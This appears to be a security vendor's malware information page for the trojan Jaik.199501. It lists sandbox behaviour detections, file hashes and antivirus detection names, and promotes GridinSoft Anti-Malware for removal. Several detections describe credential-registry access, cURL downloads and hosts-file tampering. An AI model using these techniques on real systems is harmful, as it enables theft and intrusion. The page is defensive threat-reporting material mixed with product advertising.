Malware

What is “Jaik.199501”?

Malware Removal

The Jaik.199501 is considered dangerous by lots of security experts. When this infection is active, you may notice unwanted processes in Task Manager list. In this case, it is adviced to scan your computer with GridinSoft Anti-Malware.

GridinSoft Anti-Malware

Gridinsoft Anti-Malware

Removing PC viruses manually may take hours and may damage your PC in the process. We recommend using GridinSoft Anti-Malware for virus removal. Allows to complete scan and cure your PC during the trial period.
DOWNLOAD NOW
6-day free trial available.

What Jaik.199501 virus can do?

  • Behavioural detection: Executable code extraction – unpacking
  • Connects to crypto currency mining pool
  • A file was accessed within the Public folder.
  • Uses Windows utilities for basic functionality
  • Uses the cURL utility, most likely to download a file
  • CAPE extracted potentially suspicious content
  • A HTTP/S link was seen in a script or command line
  • The binary likely contains encrypted or compressed data.
  • Authenticode signature is invalid
  • A scripting utility was executed
  • Accessed credential storage registry keys
  • Deletes executed files from disk
  • The sample wrote data to the system hosts file.
  • Attempts to execute suspicious powershell command arguments
  • Uses suspicious command line tools or Windows utilities
  • Yara rule detections observed from a process memory dump/dropped files/CAPE

How to determine Jaik.199501?



File Info:

name: 153D1BFE67F97BF1753D.mlw
path: /opt/CAPEv2/storage/binaries/1bafee36c20624bd9219e8dd43d4e75de4d3854c693ecff39f52bbeb7ea2feb0
crc32: 313265BF
md5: 153d1bfe67f97bf1753d333642aaca15
sha1: 74a83b2a50b574144d5cca33ac7544b822055b39
sha256: 1bafee36c20624bd9219e8dd43d4e75de4d3854c693ecff39f52bbeb7ea2feb0
sha512: ac64e8141a9d4792dd0b26cb215475739ddfb89ce482b94c4d61e4909fac64acea3e1bb70ee46a6f4460f50a10866c07959fde2c33f0dde0cbd0fc95941e7889
ssdeep: 196608:a3dxfgH7lvhty6qwt6X4bQr14HHwLTDmtQm5rq:a3dRgbjtZqwtuPGnw/yT2
type: PE32 executable (GUI) Intel 80386, for MS Windows
tlsh: T13E56230337918026FF9BA1734F5AF66197BCA9560123A52F13581CBABD702B1473E7A3
sha3_384: e9ccd73957b8548f9e3777573e6dbce31d30dd04948e3b584447f6f174b9a55572372f3b75a380ab5e1d5fb832d72a69
ep_bytes: e86e050000e97afeffff558bec56ff75
timestamp: 2023-11-15 23:08:45


Version Info:

Translation: 0x0809 0x04b0

Jaik.199501 also known as:

BkavW32.AIDetectMalware
LionicTrojan.Win64.Injects.ts93
Elasticmalicious (high confidence)
MicroWorld-eScanGen:Variant.Jaik.199501
FireEyeGeneric.mg.153d1bfe67f97bf1
SkyhighBehavesLike.Win32.Generic.vc
ALYacGen:Variant.Jaik.199501
Cylanceunsafe
SangforTrojan.Win32.Save.a
K7AntiVirusTrojan ( 005af7651 )
AlibabaTrojan:Win32/Povertel.638d56ed
K7GWTrojan ( 005af7651 )
Cybereasonmalicious.a50b57
ArcabitTrojan.Jaik.D30B4D
SymantecML.Attribute.HighConfidence
tehtrisGeneric.Malware
ESET-NOD32a variant of Win64/Agent_AGen.BDJ
CynetMalicious (score: 100)
APEXMalicious
KasperskyTrojan.Win32.Povertel.csi
BitDefenderGen:Variant.Jaik.199501
NANO-AntivirusTrojan.Win32.Povertel.kdxloe
AvastWin64:Evo-gen [Trj]
TencentWin32.Trojan.Povertel.Wmhl
Ad-AwareGen:Variant.Jaik.199501
EmsisoftGen:Variant.Jaik.199501 (B)
F-SecureHeuristic.HEUR/AGEN.1366653
DrWebTrojan.Siggen22.10492
VIPREGen:Variant.Jaik.199501
TrendMicroTROJ_GEN.R002C0XKG23
Trapminemalicious.moderate.ml.score
SophosMal/Generic-S
IkarusTrojan.PS.Agent
JiangminTrojan.Script.awbz
VaristW64/ABRisk.NAKC-2918
AviraHEUR/AGEN.1366653
Antiy-AVLTrojan/Win32.Wacatac
MicrosoftTrojan:Win32/Wacatac.B!ml
ZoneAlarmTrojan.Win32.Povertel.csi
GDataGen:Variant.Jaik.199501
GoogleDetected
AhnLab-V3Trojan/Win.Generic.R628666
McAfeeArtemis!153D1BFE67F9
MAXmalware (ai score=87)
VBA32BScope.Trojan.Script
MalwarebytesTrojan.Dropper.AutoIt
PandaTrj/Chgt.AD
TrendMicro-HouseCallTROJ_GEN.R002C0XKG23
RisingTrojan.Agent!8.B1E (CLOUD)
SentinelOneStatic AI – Malicious PE
MaxSecureTrojan.Malware.220497719.susgen
FortinetW32/Agent_AGen.AYF!tr
AVGWin64:Evo-gen [Trj]
DeepInstinctMALICIOUS
CrowdStrikewin/malicious_confidence_100% (W)

How to remove Jaik.199501?

Jaik.199501 removal tool
  • Download and install GridinSoft Anti-Malware.
  • Open GridinSoft Anti-Malware and perform a “Standard scan“.
  • Move to quarantine” all items.
  • Open “Tools” tab – Press “Reset Browser Settings“.
  • Select proper browser and options – Click “Reset”.
  • Restart your computer.

You may also like

About the author

Paul Valéry

I'm a cyber security analyst and data science expert with 5+ years of experience with security software contractors.

View all posts

Leave a Comment